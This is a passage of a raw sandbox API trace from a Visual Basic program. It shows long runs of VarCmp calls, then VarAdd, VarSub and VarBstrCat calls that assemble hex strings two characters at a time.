(pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.694] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.695] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.696] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.697] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.698] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.699] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.700] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.704] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.705] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.705] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.705] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.705] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.705] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.705] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.705] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.705] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.705] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.705] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.705] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H3", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.706] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.706] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.706] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H0", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.706] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.706] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.706] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.706] VarBstrCat (in: bstrLeft="&H8", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.707] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.707] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.707] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.707] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.707] VarBstrCat (in: bstrLeft="&H8", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.707] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.707] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.707] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.707] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 